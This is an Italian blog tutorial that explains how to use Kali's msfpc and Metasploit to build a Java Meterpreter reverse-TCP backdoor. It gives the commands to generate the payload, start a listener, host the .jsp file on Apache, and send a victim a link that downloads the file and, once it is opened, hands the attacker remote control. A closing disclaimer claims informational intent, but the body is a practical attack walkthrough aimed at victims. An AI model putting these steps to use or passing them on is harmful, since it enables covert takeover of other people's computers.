Ciao ragazzi, oggi, in questo articolo, andremo a parlare dei metodi che ci serviranno per creare java-meterpreter-staged-reverse-tcp backdoor; come avete ben notato anche nei precedenti articoli ho spiegato come creare backdoor simili a quella in questione; il tutto è dovuto al fatto che adopereremo per un altro po’ di tempo un importante tool di Kali Linux, ovvero Msfvenom Payload Creator, che a mio parere permette di creare backdoor molto sofisticate e soprattutto molto efficienti. Se volete potete anche leggere gli articoli su come creare bash-shell-staged-reverse-tcp backdoor e come creare linux-shell-staged-bind-tcp backdoor. Aggiungo, inoltre, che il metodo d’attacco è pressoché identico a quello analizzato nei tutorial precedenti; la vittima dovrà cliccare su un link infetto che prepareremo; in tal modo si avvierà un download automatico che scaricherà sul PC malcapitato il file virus, che, una volta startato, ci permetterà di prendere il controllo sulla macchina remota. Entriamo quindi nel dettaglio.

Il primo passo sarà quello di aprire Msfvenom Payload Creator; lo potete trovare andando in Applicazioni>Strumenti di Exploiting>msf Payload Creator.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Di seguito, una volta startato il programma, digitate sul terminale il comando “/usr/bin/msfpc verbose loop [vostro indirizzo IP]”;

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Se non sapete come ricavare il vostro indirizzo IP basterà digitare su di un nuovo terminale il comando “ifconfig”.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Molto bene, ora procediamo digitando il comando:

msfconsole -q -r ‘/root/java-meterpreter-staged-reverse-tcp-443-jsp.rc’

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Dopo questo passaggio noterete che si attiverà la msfconsole di Metasploit Framework che si metterà in ascolto.

Ora andate nella Home; di sicuro avete fatto caso alla presenza di tutti quei file che prima non c’erano; si tratta delle backdoor pronte all’utilizzo che abbiamo creato con il precedente comando “/usr/bin/msfpc verbose loop [vostro indirizzo IP]”. Di questi file, tuttavia, solo uno sarà necessario per portare a termine il nostro attacco; più precisamente sto parlando del file “java-meterpreter-staged-reverse-tcp-443.jsp”.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

 

A questo punto trasferiamo questo file nel percorso computer>var>www>html.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

 

Fatto ciò possiamo aprire un nuovo terminale e digitare il comando “service apache2 start”.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Adesso non rimarrà altro che creare un link strutturato in questa maniera: [nostro indirizzo IP]/java-meterpreter-staged-reverse-tcp-443.jsp

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

 

 

Al posto di “[nostro indirizzo IP]” inseriremo l’IP che abbiamo ricavato già recentemente con il comando “ifconfig”.

Ottimo, una volta che la vittima cliccherà sul link, si avvierà un download automatico della backdoor sul suo PC e una volta che essa verrà aperta, il terminale di Metasploit Framework in ascolto rileverà la sua presenza sul target e stabilirà una connessione segreta con il computer sotto attacco, il quale potremo ampiamente comandare a distanza.

Creare java-meterpreter-staged-reverse-tcp backdoor

 

 

 

 

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

Leggete anche il nostro articolo Creare bash-shell-staged-reverse-tcp backdoor.